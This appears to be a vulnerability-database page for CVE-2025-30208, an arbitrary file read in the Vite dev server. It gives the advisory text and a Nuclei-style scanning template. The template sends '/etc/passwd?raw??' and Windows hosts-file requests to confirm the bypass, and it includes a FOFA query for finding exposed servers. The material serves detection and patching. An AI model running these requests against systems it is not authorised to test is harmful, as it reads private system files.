CVE-2025-30208: Vite - Arbitrary File Read

2025-08-01 Vite PoC Public

Description

Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.

PoC

id: CVE-2025-30208

info:
  name: Vite - Arbitrary File Read
  author: v2htw,s4e-io
  severity: medium
  description: |
    Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
  impact: |
    Attackers can bypass file access restrictions by adding special query parameters to URLs, potentially reading arbitrary files when the Vite dev server is exposed to the network.
  remediation: |
    Upgrade to Vite version 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 that properly validates query parameters.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  classification:
    epss-score: 0.74969
    epss-percentile: 0.9948
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-30208
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'body="/@vite/client"'
  tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "vite"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/etc/passwd?raw"
      - "{{BaseURL}}/etc/passwd?raw??"
      - "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "Copyright \\(c\\).*Microsoft Corp"
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e5868045149ac84241a96ba41c815d5c343fc2c895e79bcceb3865d79b38c550022100d342b1f555c387927d5b51b794391656598110c7131598228f5b9607e54d40f0:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities